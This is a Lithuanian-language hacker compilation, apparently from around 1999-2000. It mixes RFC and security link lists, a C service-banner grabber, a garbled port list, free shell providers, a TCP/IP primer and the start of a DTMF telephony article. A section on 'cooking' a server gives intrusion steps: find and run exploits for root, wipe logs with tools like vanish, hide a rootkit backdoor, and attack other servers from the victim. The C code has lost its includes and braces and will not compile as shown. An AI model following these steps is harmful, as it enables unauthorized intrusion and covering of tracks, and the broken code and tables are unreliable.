tai tiksliausia, rimcziausia ir ishsamiausia info apie tai, kaip veikia

Internetas.

Idealiausias variantas butu perskaityti ir isiminti visus RFC, bet dabar yra serbentilijonai tu RFC’u o kai kuriems ish musu dar reikia laiko miegui ir valgymui 🙂 Taigi, tie, kas neturi fotografines atminties ir mariu laisvo laiko turetu atsirinkti, ka skaityti, kad rastu atsakymus i ji dominanczius klausimus. Neblogas startas – ishsamus visu RFC’u sarashas su ju pavadinimais, kuri rasite adresu:

ftp://ftp.tstt.net.tt/pub/inet/rfc/rfc-index

Arba RFC apie RFC’us (!) – taip, yra toks dokumentas, RFC 825, kuris, faktishkai, yra RFC’u specifikacija. Kad ji rastumete, tiesiog i

Altavistos uzhklausimo lauka irashykite „RFC 825” (su kabutemis, butent taip, kaip parashyta czia). Tokiu pat budu galite rasti bet koki RFC, kurio numeri jus zhinote.

Tacziau RFC’us kartais gana sunku suprasti. Ish kur zhinoti, koki RFC’a skaityti, kad rastume atsakyma i musu klausima? O isheitis – RFC’u grupe, kuri vadinasi „FYIs”. Tai nera specifikacijos, o tiesiog kitu RFC’u paaishkinimai. (Uf, jaucziuosi kaip koks Shvento Rashto aishkintojas :] )

Kur gauti tuos FYI? Pazhiurekim, ka sako shiuo klausimu RFC apie FYI

(RFC 1150) {vertimas}: FYI galima isigyti per FTP ish NIC.DDN.MIL, nurodzhius kelia FYI:mm.txt, arba RFC:RFCnnnn.txt (kur „mm” yra FYI

numeris o „nnnn” yra „RFC” numeris). Isiloginama per FTP su username

ANONYMOUS ir password GUEST. NIC taip pat teikia automatinio pashto paslauga tiems, kas negeli naudotis FTP. Siuskite uzhklausima adresu

SERVICE@NIC.DDN.MIL ir ‘subject’ skilty nurodykite FYI ar RFC numeri formatu „Subject: FYI mm” arba „Subject: RFC nnnn”.

Bet netgi dar geresnis dalykas – RFC’ai susieti tarpusavyje hiperlinkais (nuorodom) Webe adresu http://www.FreeSoft.org/Connected/

Tai yra labai cool sourc’as. Nors jame nera sudeti visi RFC’ai, bet shiame saite yra vadovas ir naujokui patogus nuorodu i RFC’us ‘komplektas’.

Taip pat norecziau pamineti dar keleta adresu, susijusiu su kompiuteriniu sistemu saugumu:

http://csrc.nist.gov/secpubs/rainbow/

http://GANDALF.ISU.EDU/security/security.html – security library

Operaciniu sistemu problemos ir skyles su ataku pavyzdzhiais:

http://www.netspace.org/lsv-archive/bugtraq.html – bugtraq archyvai http://www.ntbugtraq.com – ntbugtraq

RTFM!

Bet kartais netgi perskaiczius kruva technines literaturos mes nerandam atsakymo i musu klausima ar problemos sprendimo. Tada lieka vienintelis budas – paklausti ishmananczio zhmogaus. Czia ir gelbsti e-konferencijos,

IRC bei newsgroup’ai.

Newsgroup’u pvz.:

alt.security alt.2600

alt.hackers

maillist’u pvz.:

bugtraq mailing list (ishsiuskite maila adresu listserv@netspace.org laishko turiny parashe zhodi help ir sekite instrukcijas)

IRC kanalu pvz.:

#hakeriai

#hackers

Info apie newsgroup’us, mail-listus ir IRC kanalus galite rasti webe per ta paczia Altavista, i uzhklausimo lauka irashe kazhka panashaus i „security mailing lists”, etc.

Dar vienas dalykas – nueikite i http://www.scip.org

Tai yra ‘Society of Competitive Information Professionals’ saitas. Gal susilauksite pagalbos ten? :]

Creditai: thanx Carolin Meinel, kurios rashliava ash kadaise labai sekmingai maitinausi ir shiame texte yra daug ref i GTmHH 🙂

(http://www.happyhacker.org)

Knowledge is power!

ww0lf

Automatizuok savo darbus- patikrink servisu headerius

Ieskant tam tikros rusies servisu nera patogu kiekviena syki jungtis prie aukos telnetu ir tikrinti servisu headerius (Pvz. telnet nasa.mil 21).

Tokiu atveju geriausia pasirasyti programa kuri pati automatizuoja tokius veiksmus.

Tad viena diena pamegnau as tokia parasyti:

/* http://www.zemrsn.lt/uid0 – code (c) SataN

testheader.c

Sitas toolsas skirtas palengvinti targeto servisu versiju patikrinima ir pan.

Ji kompilioti reikia taip:

#gcc testheader.c -o testheader

Naudotis juo paprastai galima tai:

#./testheader arba berods galima kazkaip panasiai :

#cat hostu.sarasas.IP | while read ip, port ; do ./testheader $ip $port; done | tee headeriu.sarasas

Tada bus nuskaitomas hostu ir portu sarasas is failo ir bandoma prie junktis. rezultatas bus kitame faile.

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

int main (int argc, char **argv)

struct hostent *hp;

struct in_addr addr;

struct sockaddr_in s;

char buf[280];

int p;

if (argc < 3 )

printf („usage: %s .n”, argv[0]);

exit (1);

hp = gethostbyname (argv[1]);

if (!hp)

exit (1);

bcopy (hp->h_addr, &addr, sizeof (struct in_addr));

p = socket (s.sin_family = AF_INET, 1, 0);

s.sin_port = htons ( atoi( argv[2] ) );

s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));

if ( !connect (p, &s, sizeof (s)))

alarm (5);

read (p, buf, 255);

close (p);

printf („Connected to %s (on port %s)…nTarget headre is:nn%snn”, argv[1], argv[2], buf);

else

perror(„Can’t conncet to host”);

return 0;

Nesu tikras kad sis toolas yra visiskai geras- nenustebsiu jei rasite vabaliuku- bugu.

44. Serverio nukepimas

-= Kaip nukepti serveri? =-

Nera tikslaus algoritmo kaip nuhakinti serveri. Viskas priklauso nuo serverio konfiguracijos, serverio OS etc. As cia pabandziau pateikti keleta bendru hakinimo punktu:

Suzinok kuo daugiau apie serveri: jo OS, programine iranda etc. Kaip suzinoti? Yra daug budu. Tarkim noorint suzinot ftp servo versija reikia su telnet prisijungti prie to servo per 21 porta. O sendmail versija – per 25 porta, pop – 110 etc.

Bandykite susiieskoti esamam softui exploitu. Kur ieskoti? Visur: astalavista, bugtraq etc. Surade exploita susikompiliuokit ji ir panaudokit. Taip gausite root teisias.

Dar pamenat taisykle: NEIKLIUK! ? Tad isvalyk is logu visu info apie tave. Logai gali buti ne tik standartiniai, bet uzslepti etc. Tad galima prie ju uzsikasti. Is http://packetstorm.securify.com galite pasiimti paketa vanish ar pan., kuris pats automatiskai pravalo logus (negarantuojama 100%).

O ka, kita karta vel ta pati? Nea. Tam yra toks dalykas BackDoor (ju pilnas inetas, rekomendoju rootkit is http://packetstorm.securify.com

). Pasidaryk atsargini iejima. Tiesa, ji reikia gerai pakavoti, nes jei ji suseks tai viskas nais suniui ant uodegos.

Daba jau gali daryti su servu ka nori: hakinti kitus servus is jo, imti reikalinga info etc.

Is tikro hakinimas gali skirtis labai nuo situ isvardintu punktu. Bet visuomet lieka ta pacia ideja: Visos programos turi bugus, kurias turi kaskas gi pasinaudoti. Galima atrasti silpna CGI vieta, klaida filtruojant tuos zymiuosius JavaScript ir pan. Svarbiausia tokiems dalykams reikia geros vaizduotes ir geru minciu, reikia zinoti kokiu principu veikia vienoks ar kitoks softas, kurio bugu deka hakinate.

45. Servisai

Servisai ir ju portai bei protokolai

Kartais reikia zinoti kosk servisas naudoja koki porta. Is tikro galima paciam rankiniu budu pakeisti porto numeri, bet lamos adminai to nedaro. Jie palieka porta pagal nutylejima (default port). Tad cia pateikiu servisu sarasa, ju naudojama protokola ir ju default porta.

Tiems kas naudoja kokia tai UNIX seimos operacinia sitema tai nera aktualu. Didzia dali sio saraso galima rasti /etc/services

# /etc/services:

# $Id: services,v 1.4 1997/05/20 19:41:21 tobias Exp $

# Network services, Internet style

# Note that it is presently the policy of IANA to assign a single well-known

# port number for both TCP and UDP; hence, most entries here have two entries

# even if the protocol doesn’t support UDP operations.

# Updated from RFC 1700, „Assigned Numbers” (October 1994). Not all ports

# are included, only the most common ones.

tcpmux1/tcp# TCP port service multiplexer echo7/tcp echo7/udp discard9/tcpsink null discard9/udpsink null systat11/tcpusers daytime13/tcp daytime13/udp netstat15/tcp qotd17/tcpquote msp18/tcp# message send protocol msp18/udp# message send protocol ahargen19/tcpttytst source caargen19/udpttytst source ftp-data20/tcp ftp21/tcp fsp21/udpfspd ssh22/tcp# SSH Remote Login Protocol ssh22/udp# SSH Remote Login Protocol telnet23/tcp

# 24 – private smtp25/tcpmail

# 26 – unassigned time37/tcptimserver time37/udptimserver rlp39/udpresource# resource location nameserver42/tcpname# IEN 116

whois43/tcpnicname re-mail-ck50/tcp# Remote Mail Checking Protocol re-mail-ck50/udp# Remote Mail Checking Protocol domain53/tcpnameserver# name-domain server domain53/udpnameserver mtp57/tcp# deprecated bootps67/tcp# BOOTP server bootps67/udp bootpc68/tcp# BOOTP client bootpc68/udp tftp69/udp gopher70/tcp# Internet Gopher gopher70/udp rje77/tcpnetrjs finger79/tcp www80/tcphttp# WorldWideWeb HTTP

www80/udp# HyperText Transfer Protocol link87/tcpttylink kerberos88/tcpkerberos5 krb5# Kerberos v5

kerberos88/udpkerberos5 krb5# Kerberos v5

supdup95/tcp

# 100 – reserved hostnames101/tcphostname# usually from sri-nic iso-tsap102/tcptsap# part of ISODE.

csnet-ns105/tcpcso-ns# also used by CSO name server csnet-ns105/udpcso-ns

# unfortunately the poppassd (Eudora) uses a port which has already

# been assigned to a different service. We list the poppassd as an

# alias here. This should work for programs asking for this service.

# (due to a bug in inetd the 3com-tsmux line is disabled)

#3com-tsmux106/tcppoppassd

#3com-tsmux106/udppoppassd rtelnet107/tcp# Remote Telnet rtelnet107/udp pop-2109/tcppostoffice# POP version 2

pop-2109/udp pop-3110/tcp# POP version 3

pop-3110/udp sunrpc111/tcpportmapper# RPC 4.0 portmapper TCP

sunrpc111/udpportmapper# RPC 4.0 portmapper UDP

auth113/tcpauthentication tap ident sftp115/tcp uucp-path117/tcp nntp119/tcpreadnews untp# USENET News Transfer Protocol ntp123/tcp ntp123/udp# Network Time Protocol netbios-ns137/tcp# NETBIOS Name Service netbios-ns137/udp netbios-dgm138/tcp# NETBIOS Datagram Service netbios-dgm138/udp netbios-ssn139/tcp# NETBIOS session service netbios-ssn139/udp imap2143/tcpimap# Interim Mail Access Proto v2

imap2143/udpimap snmp161/udp# Simple Net Mgmt Proto snmp-trap162/udpsnmptrap# Traps for SNMP

cmip-man163/tcp# ISO mgmt over IP (CMOT)

cmip-man163/udp cmip-agent164/tcp cmip-agent164/udp xdmcp177/tcp# X Display Mgr. Control Proto xdmcp177/udp nextstep178/tcpNeXTStep NextStep# NeXTStep window nextstep178/udpNeXTStep NextStep# server bgp179/tcp# Border Gateway Proto.

bgp179/udp prospero191/tcp# Cliff Neuman’s Prospero prospero191/udp irc194/tcp# Internet Relay Chat irc194/udp smux199/tcp# SNMP Unix Multiplexer smux199/udp at-rtmp201/tcp# AppleTalk routing at-rtmp201/udp at-nbp202/tcp# AppleTalk name binding at-nbp202/udp at-echo204/tcp# AppleTalk echo at-echo204/udp at-zis206/tcp# AppleTalk zone information at-zis206/udp qmtp209/tcp# The Quick Mail Transfer Protocol qmtp209/udp# The Quick Mail Transfer Protocol z3950210/tcpwais# NISO Z39.50 database z3950210/udpwais ipx213/tcp# IPX

ipx213/udp imap3220/tcp# Interactive Mail Access imap3220/udp# Protocol v3

rpc2portmap369/tcp rpc2portmap369/udp# Coda portmapper codaauth2370/tcp codaauth2370/udp# Coda authentication server ulistserv372/tcp# UNIX Listserv ulistserv372/udp https443/tcp# MCom https443/udp# MCom snpp444/tcp# Simple Network Paging Protocol snpp444/udp# Simple Network Paging Protocol saft487/tcp# Simple Asynchronous File Transfer saft487/udp# Simple Asynchronous File Transfer npmp-local610/tcpdqs313_qmaster# npmp-local / DQS

npmp-local610/udpdqs313_qmaster# npmp-local / DQS

npmp-gui611/tcpdqs313_execd# npmp-gui / DQS

npmp-gui611/udpdqs313_execd# npmp-gui / DQS

hmmp-ind612/tcpdqs313_intercell# HMMP Indication / DQS

hmmp-ind612/udpdqs313_intercell# HMMP Indication / DQS

-= UNIX specific services =-

exec512/tcp biff512/udpcomsat login513/tcp who513/udpwhod shell514/tcpcmd# no passwords used syslog514/udp printer515/tcpspooler# line printer spooler talk517/udp ntalk518/udp route520/udprouter routed# RIP

timed525/udptimeserver tempo526/tcpnewdate courier530/tcprpc conference531/tcpchat netnews532/tcpreadnews netwall533/udp# -for emergency broadcasts uucp540/tcpuucpd# uucp daemon afpovertcp548/tcp# AFP over TCP

afpovertcp548/udp# AFP over TCP

remotefs556/tcprfs_server rfs# Brunhoff remote filesystem klogin543/tcp# Kerberized `rlogin’ (v5)

kshell544/tcpkrcmd# Kerberized `rsh’ (v5)

kerberos-adm749/tcp# Kerberos `kadmin’ (v5)

webster765/tcp# Network dictionary webster765/udp

# From „Assigned Numbers”:

#> The Registered Ports are not controlled by the IANA and on most systems

#> can be used by ordinary user processes or programs executed by ordinary

#> users.

#> Ports are used in the TCP [45,106] to name the ends of logical

#> connections which carry long term conversations. For the purpose of

#> providing services to unknown callers, a service contact port is

#> defined. This list specifies the port used by the server process as its

#> contact port. While the IANA can not control uses of these ports it

#> does register or list uses of these ports as a convienence to the

#> community.

ingreslock1524/tcp ingreslock1524/udp prospero-np1525/tcp# Prospero non-privileged prospero-np1525/udp datametrics1645/tcpold-radius# datametrics / old radius entry datametrics1645/udpold-radius# datametrics / old radius entry sa-msg-port1646/tcpold-radacct# sa-msg-port / old radacct entry sa-msg-port1646/udpold-radacct# sa-msg-port / old radacct entry radius1812/tcp# Radius radius1812/udp# Radius radacct1813/tcp# Radius Accounting radacct1813/udp# Radius Accounting cvspserver2401/tcp# CVS client/server operations cvspserver2401/udp# CVS client/server operations venus2430/tcp# codacon port venus2430/udp# Venus callback/wbc interface venus-se2431/tcp# tcp side effects venus-se2431/udp# udp sftp side effect codasrv2432/tcp# not used codasrv2432/udp# server port codasrv-se2433/tcp# tcp side effects codasrv-se2433/udp# udp sftp side effect mysql3306/tcp# MySQL

mysql3306/udp# MySQL

rfe5002/tcp# Radio Free Ethernet rfe5002/udp# Actually uses UDP only cfengine5308/tcp# CFengine cfengine5308/udp# CFengine bbs7000/tcp# BBS service

# Kerberos (Project Athena/MIT) services

# Note that these are for Kerberos v4, and are unofficial. Sites running

# v4 should uncomment these and comment out the v5 entries above.

kerberos4750/udpkerberos-iv kdc# Kerberos (server) udp kerberos4750/tcpkerberos-iv kdc# Kerberos (server) tcp kerberos_master751/udp# Kerberos authentication kerberos_master751/tcp# Kerberos authentication passwd_server752/udp# Kerberos passwd server krb_prop754/tcp# Kerberos slave propagation krbupdate760/tcpkreg# Kerberos registration kpasswd761/tcpkpwd# Kerberos „passwd”

kpop1109/tcp# Pop with Kerberos knetd2053/tcp# Kerberos de-multiplexor zephyr-srv2102/udp# Zephyr server zephyr-clt2103/udp# Zephyr serv-hm connection zephyr-hm2104/udp# Zephyr hostmanager eklogin2105/tcp# Kerberos encrypted rlogin

# Unofficial but necessary (for NetBSD) services

supfilesrv871/tcp# SUP server supfiledbg1127/tcp# SUP debugging

# Datagram Delivery Protocol services

rtmp1/ddp# Routing Table Maintenance Protocol nbp2/ddp# Name Binding Protocol echo4/ddp# AppleTalk Echo Protocol zip6/ddp# Zone Information Protocol

# Services added for the Debian GNU/Linux distribution

poppassd106/tcp# Eudora poppassd106/udp# Eudora mailq174/tcp# Mailer transport queue for Zmailer mailq174/tcp# Mailer transport queue for Zmailer ssmtp465/tcp# SMTP over SSL

gdomap538/tcp# GNUstep distributed objects gdomap538/udp# GNUstep distributed objects snews563/tcp# NNTP over SSL

ssl-ldap636/tcp# LDAP over SSL

omirr808/tcpomirrd# online mirror omirr808/udpomirrd# online mirror rsync873/tcp# rsync rsync873/udp# rsync simap 993/tcp# IMAP over SSL

spop3995/tcp# POP-3 over SSL

socks1080/tcp# socks proxy server socks1080/udp# socks proxy server rmtcfg1236/tcp# Gracilis Packeten remote config server xtel1313/tcp# french minitel support1529/tcp# GNATS

cfinger2003/tcp# GNU Finger ninstall2150/tcp# ninstall service ninstall2150/udp# ninstall service afbackup2988/tcp# Afbackup system afbackup2988/udp# Afbackup system icp3130/tcp# Internet Cache Protocol (Squid)

icp3130/udp# Internet Cache Protocol (Squid)

postgres5432/tcp# POSTGRES

postgres5432/udp# POSTGRES

fax4557/tcp# FAX transmission service (old)

hylafax4559/tcp# HylaFAX client-server protocol (new)

noclog5354/tcp# noclogd with TCP (nocol)

noclog5354/udp# noclogd with UDP (nocol)

hostmon5355/tcp# hostmon uses TCP (nocol)

hostmon5355/udp# hostmon uses TCP (nocol)

ircd6667/tcp# Internet Relay Chat ircd6667/udp# Internet Relay Chat webcache8080/tcp# WWW caching service webcache8080/udp# WWW caching service tproxy8081/tcp# Transparent Proxy tproxy8081/udp# Transparent Proxy mandelspawn9359/udpmandelbrot# network mandelbrot amanda10080/udp# amanda backup services kamanda10081/tcp# amanda backup services (Kerberos)

kamanda10081/udp# amanda backup services (Kerberos)

amandaidx10082/tcp# amanda backup services amidxtape10083/tcp# amanda backup services isdnlog20011/tcp# isdn logging system isdnlog20011/udp# isdn logging system vboxd20012/tcp# voice box system vboxd20012/udp# voice box system binkp24554/tcp# Binkley binkp24554/udp# Binkley asp27374/tcp# Address Search Protocol asp27374/udp# Address Search Protocol tfido60177/tcp# Ifmail tfido60177/udp# Ifmail fido60179/tcp# Ifmail fido60179/udp# Ifmail

# Local services linuxconf 98/tcp swat 901/tcp # Add swat service used via inetd

-= NT specifiniai portai: =-

Ne visi serveriai stovi ant UNIX sistemu. Daugelis stovi ir ant NT. Kaip zinia NT dauguma servisu poru skirtingi negu UNIX.

Tad cia pateikiu NT portus ir protokolus.

-= Open Service Ports =-

Windows NT Functionality UDP TCP IP

Browsing 137,138

DHCP Lease 67,68

DHCP Manager 135

DNS Administration 139

DNS Resolution 53

File Sharing 139

Logon Sequence 137,138 139

NetLogon 138

NT Diagnostics 139

NT Directory Replication 138 139

NT Event Viewer 139

NT Performance Monitor 139

NT Registry Editor 139

NT Secure Channel 137,138 139

NT Server Manager 139

NT Trusts 137,138 139

NT User Manager 139

Pass Through Validation 137,138 139

PPTP 1723 47

Printing 137,138 139

WINS Manager 135

WINS Registration 137

WINS Replication 42

Exchange Functionality

Client/Server Comm. 135

Exchange Administrator 135

IMAP 143

LDAP 389

LDAP (SSL) 636

MTA – X.400 over TCP/IP 102

POP3 110

RPC 135

SMTP 25

46. Shell dykai

-=Turinys=-

-=1. Kas yra shell?=-

-=2. Kur galima gauti shell uz dyka?=-

-=1. Kas yra shell?=-

Shell yra komandu interpretatorius, kuris vercia jusu komandas i suprantamas operaciniai sistemai komandas. Dazniausiai kai apie shell kalbama, turima galvoje *NIX shell (bash, sh etc). Is tikro ir windows turi shell. Jis yra command.com.

Su shell galimi tokie veiskmai: failu, katalogu tvarkymas, failu vykymas, redagavimas, kurimas, isnaudoti savo hardware.

-=2. Kur galima gauti shell uz dyka?=-

Cia pateikiu trumpa sarasa kur galima gauti shell uz dyka bei trumpa to shell aprasyma.

http://www.Linuxshell.org

Duoda nemokama Linux Shell akaunta, www vietos (5MB) ir POP3 email.

http://www.ShellYeah.org

Leidzia IRC (IRC-II Epic arba Bitch), Pine e-mail`ui, USENET Tin, ICQ su Micq.

Shell`as sedi po unix, galite naudot arba Bash arba Tcsh interpretatoriu ir kurti shell scenarijus (skriptus).

http://www.DucTape.net

UNIX sistemos shell. Leidzia naudotis IMAP Email ir keleta kitu servisu.

http://www.Freeshells.net

Pine, Pico, IRC (bX ir ircII client),Bash shell, lynx, PERL ir .cgi!

http://www.NYX.net

Duoda nemokama UNIX shell.

http://www.Nether.Net

Linux Box shell`as.

http://www.Arbornet.org/Projects.html

M-Net yra „America’s First Public Access UNIX System.” Kad prisjungtumet prie M-Net, rasykite : telnet m-net.arbornet.org. Kad sukurtumete nauja acounta iveskite login dalyje: „prompt”. Leidzia naudotis e-mail, lynx, ftp, IRC, kompiletoriais. Leidzia tureti www puslapi.

Jugbone http://www.jugbone.cx

Jugbone yra standartinis UNIX shell ir leidzia naudotis kompiletoriais, IRC kliantais, pastu etc.

47. TCP/IP totorial`as

Internetas- didziausias pasaulio globalusis tinklas.

TCP/IP yra protokolas (tiksliau protokolu rinkinys) jungiantis daug kompiuteriu ir uztikrinanis gera duomenu perdavimo kokybe etc.

TCP/IP susideda is dag protokolu:

TCP (Transmission Control Protocol) – protokolas, orientuotas i susijungimus, kuris garantuoja patikima baitu srauto perdavima tarp dvieju sistemu.

UDP (User Datagram Protocol) – protokolas skirtas vartotojiskiems procesams, dirbantis be susijungimo patikrinimo. Priesingai nei TCP, kuris priklauso patikimiems protokolams, nera garantijos, kad UDP pasiusti duomenys pasieks adresata.

ICMP (Internet Control Message Protocol) protokolas palaiko informacijos apie klaidas perdavima ir valdo informacija tarp tinklo sliuzu ir mazgu. ICMP pranesimai generuojami ir apdorojami Interneto programine iranga, o ne vartotojiskais procesais.

IP (Internet protocol) – protokolas tarnaujantis duomenu paketu persiuntimui TCP, UDP ir ICMP protokolams. IP aptarnauja kompiuteriu susijungimus, naudojant taip vadinama IP adresacija.

ARP (Adress Resoliution Protocol) – sis protokolas pavercia Interneto adresa i irenginio adresa (pavyzdziui, kanalu (Data Link) lygyje Ethernet tipo irenginiui).

RARP (Reverse Adress Resoliution Protocol) – pavercia irenginio adresa i Interneto adresa.

FTP (File Transfer Protocol) aptarnauja failu perdavima TCP

protokolu. Apie FTP yra atskiras straipsnis (ziureti virsuj arba spausti cia).

TELNET (Remote Login). Sis protokolas leidzia terminalu prisijungti prie nutolusios sistemos.

SMPT (Simple Mail Transfer Protocol) – TCP protokolo pagalba suteikia galimybe siusti elektronini pasta DNS (Domain Name Service) – aptarnauja simbolinio adreso

Interneto adresu pavertima.

NFS (Network File System) protokolas suteikia galimybe tvarkyti nutolusio kompiuterio failus.

-=Kas yra IP adresas?=-

IP adresas tai unikalus adresas atitinkantis tam fizini objekta (kompiuteri, roiteri). Kiekvienas kompiuteris prie Interneto jungiasi unikaliu IP adresu.

-=Kokie yra IP adresu tipai?=-

Kiekvienas kompiuteris TCP/IP tinkle turi triju lygiu adresus:

fizinis (MAC adresas)

tinklinis (IP adresas)

simbolinis (DNS vardas)

-=Kas yra MAC tipo adresas?=-

MAC tinklinio adapterio adresas arba marsrutizatoriaus portas, pavyzdziui, 11-A0-17-3D-BC-01. Siuos adresus nustato gamintojai ir be to jie yra unikalus, nes yra centralizuotai valdomi. MAC adresai turi 6 Baitu formato: vyresnieji 3 baitai – gamintojo kodas, o mazesnieji 3 baitai nustatomi gamintoju tam tikru budu. Globalus tinklai, tokie kaip X.25 arba Frame Relay, lokalu adresa nustato tinklo administratorius.

-=Kas yra IP tipo adresas?=-

IP – adresas, kuri sudaro 4 baitai, pavyzdziui, 109.26.17.100. Sis adresas naudojamas tinkle. Ji nustato administratorius, kompiuterio ir marsrutizatoriu konfiguravimo metu. IP adresas susideda is dvieju daliu: tinlo ir mazgo numerio. Tinklo numeris gali buti parinktas administratoriaus, arba pagal specialios organizacijos, Network Information Center (NIC) rekomendacijas, kai tinklas turi dirbti kaip Interneto dalis.

Daznai Interneto paslaugu tiekejai (provaiders) gauna tam tikru adresu intervala is NIC organizacijos, o po to paskirsto juos savo abonentams. Mazgo numeris IP adrese nustatomas nepriklausant lokalaus adreso mazgui. IP adreso dalinimas i dvi dalis yra lankstus, ir ribas tarp siu lauku galima nustatyti labai paprastai. Mazgas gali ieiti i kelis IP tinklus. Tokiu atveju mazgas turi tureti kelis IP adresus, pagal tinklu skaiciu. Taigi IP adresas nusako ne atskira kompiuteri arba marsrutizatoriu, bet viena tinlini sujungima.

-=Kas yra DNS tipo adresas?=-

Simbolinis identifikatorius-vardas (DNS), pavyzdziui SERV1.COM. Si adresa sukuria administratorius ir ji sudaro kelios dalys, pavyzdziui kompiuterio vardas, organizacijos pavadinimas, domenas. DNS yra naudojamas programiniame lygyje,pavyzdziui FTP ir TELENT protokoluose.

-=Kaip vaizduojamas IP adresas?=-

IP adreso dydis 4 baitai ir daznaiusiai yra uzrasomas keturiu skaiciu seka, kurioje kievienas baitas yra desimtaineje formoje ir atskiriamas vienas nuo kito taskais. 128.10.2.30 – tradicine adreso vaizdavimo forma desimtaineje sistemoje.

10000000 00001010 00000010 00011110 – adresas, dvejetaineje sistemoje.

-=Kaip sudaromas IP adresas?=-

Adresa sudaro dvi logines dalys – tinklo numeris ir mazgo numeris tinkle. Kokia dalis adreso priklauso tinklo numeriui, o kokia dalis mazgo numeriui, nustatoma pagal pirmus adreso bitus.

I kokias klases skirstomi TCP/IP adresai?

Jei adreso pirmas bitas yra 0, tai tinklas priklauso A klasei, ir tinklo numeris uzima 1 baita, mazgo numeris – 3 baitus. A klases tinklo skaicius yra intervale nuo 1 iki 126. Skaicius 0 nenaudojamas, o skaicius 127 rezervuotas specialiems tikslams.

Jei adreso pirmi du bitai lygus 10, tai tinklas priklauso B klasei ir yra vidutiniu tinklu dydzio. B klases tinklo adresui ir mazgo adresui skiriami 16 bitu, tai yra po 2 baitus.

Jei adresas prasideda skaiciu seka 110, tai jis priklauso C klases tinklui. Tinklo adresui skiriami 24 bitai, o mazgo adresui 8 bitai.

Jei adresas prasideda seka 1110, tai jis priklauso D klasei ir yra ypatingas, vadinamas MULTICAST. Jei duomenu pakete adresas priklauso D klasei, tai toki paketa turi gauti visi mazgai, kurie priskirti duotam adresui.

Jei adresas prasideda 11110, tai jis priklauso E klasei ir yra rezervuotas ateiciai.

Kokiai klasei priklauso tam tikras adresas?

Klase Mazausias adresas Didziausias adresas

A 0.1.0.0 126.0.0.0

B 128.0.0.0 191.255.0.0

C 192.0.1.0 223.255.255.0

D 224.0.0.0 239.255.255.255

E 240.0.0.0 247.255.255.255

-=Kas yra marsrutizacija?=-

Kiekvienas paketas, einantis per tinkla turi gavejo adresa, ir yra siunciamas pagal numatytas marsrutizacijos taisykles.

Marsrutizavimas – tai duomenu paketo siuntimas per tinkla labirintus, esancius tarp saltinio ir adresato.

-=Kokie yra specialus IP adresai?=-

Jei IP adresa sudaro tik nuliai dvejetaineje sistemoje, tai jis nurodo adresa to mazgo, kuris sugeneravo si paketa. (0.0.0.0)

Jei tinklo skaiciu lauke yra nuliai (0000..000, Mazgo numeris), tai pagal nutylejima skaitoma, kad sis mazgas priklauso tam paciam tinklui, kaip ir mazgas, kuris nusiunte paketa. (pvz.: 0.0.0.1)

Jei visi IP adresai dvejetaineje sistemoje yra 1, tai paketas su tokiu tikslo adresu privalo buti issiustas visiems mazgams, esantiems siame tinkle, kaip ir paketo saltinis. Toks siuntimas vadinamas LIMITED BROADCAST.

Jei mazgo lauke dvejetaineje sistemoje yra vienetai (Tinklo numeris, 111..111), tai paketas turintis toki adresa yra siunciamas visiems tinklo mazgams su uzduotu numeriu. Tai vadinama BROADCAST.

Adresas 127.0.0.1 rezervuotas atgalinio rysio organizavimui, testuojant programine iranga nesiunciant duomenu paketo i tinkla. Jis vadinamas LOOPBACK.

IP adresas priklausantis D klasei (MULTICAST) reiskia, kad paketas turi buti issiustas iskarto keliems mazgams, nurodytiems adreso lauke. Mazgai patys save nustato, kuriai grupei jie priklauso. Vienas ir tas pats mazgas gali ieiti i kelias grupes. Tokie pranesimai vadinami MULTICAST. Grupinis adresas nera dalinamas i tinklo ir mazgo laukus. Jis apdorojamas ypatingu budu marsrutizatoriaus.

-=Kaip nustatomas IP adresas?=-

IP protokole, t.y. kompiuterio adresas arba marsrutizatoriaus portas, nustatomas tinklo administratoriaus ir jis nera tiesiogiai susijes su lokaliu adresu, kaip tai padaryta IPX protokole.

-=Kas yra DNS?=-

DNS (Domain Name System) – tai duomenu baze, palaikanti hierarchine sistema Internete. DNS tarnyba skirta automatinei IP adreso paieskai zinant simbolini mazgo varda.

-=Kas yra domenas?=-

Domenas – tai simbolinio DNS vardo priesaga, pvz; .lt.

Domeno vardas gali buti iki 63 simboliu. Kiekvienas kompiuteris Internete turi savo pilna domeno varda (fully qualified domain name, FQDN).

-=Kas yra DNS serveris ir klientas?=-

DNS yra pagalbinis protokolas. Jis nera simetriskas nes jame nustatyti DNS serveriai ir DNS klientai. DNS serveriai laiko dali duomenu bazes apie simbolinius IP adresu vardus. Si duomene baze paskirstyta pagal Interneto administracinius domenus. DNS

klientai zino administracinio domeno, DNS serverio, IP adresa ir IP protokolo pagalba perduoda uzklausa, kurioje pranesa simbolini varda ir praso grazinti IP adresa.

Jei duomenys apie uzklausa laikomi DNS serverio duomenu bazeje, tai jis is karto pasiuncia atsakymu klientui, jei ne – serveris siuncia uzklausa kitam domeno DNS serveriui, kuris arba pats apdoroja uzklausa arba persiuncia ji kitam serveriui. Visi DNS serveriai yra sujungti hierarchiskai, priklausomai nuo domeno tinklo hierarchijos Internete.

-=Kas yra DHCP protokolas?=-

Kaip jau buvo mineta, IP adresas gali buti paskirtas tinklo administratoriaus. Tai uzima daug laiko. Problema yra ir vartotojai, mazai zinantys apie kompiuterio konfiguravimo, tad visos bedos tenka administratoriui.

Dynamic Host Configuration Protocol (DHCP) buvo sukurtas tam, kad palengvintu administratoriu darba. Pagrinidinis sio protokolo tikslas yra dinaminis IP adresu paskyrimas. Taip pat jis palaiko rankini ir automatini statinii adresu paskyrima.

Dinaminis adresu paskirstymas leidzia kurti IP tinkla, kuriame mazgu skaicius virsija esama skaiciu IP adrese. DHCP yra patikimas ir paprastas TCP/IP tinklo konfiguratorius, garantuojantis, kad nebus vienodu adresu.

48. Toniniai signalai telefonijoje

Parenge: ww0lf

1999/09

Telefonijoje naudojami du pagrindiniai toniniu signalu tipai: DTMF ir MKTT

Abu shie standartai naudoja dvieju tonu signala, t. y. signalas susideda ish dvieju zhymiai besiskiriancziu garso dazhniu. Didesnio dazhnio signalo amplitude yra proporcinga mazhesnio dazhnio signalo einamajai reikshmei.

DTMF standartas

DTMF (Dual Tone Multiple Frequency) yra dazhniu rinkinys „2 ish 8”. Jis naudojamas renkant numeri vadinamu toniniu rinkimu. Kiekvienas signalas susideda ish dazhniu, kurie yra dvieju grupiu:

Zhemesniosios grupes dazhniai: 697 Hz, 770 Hz, 852 Hz, 941 Hz;

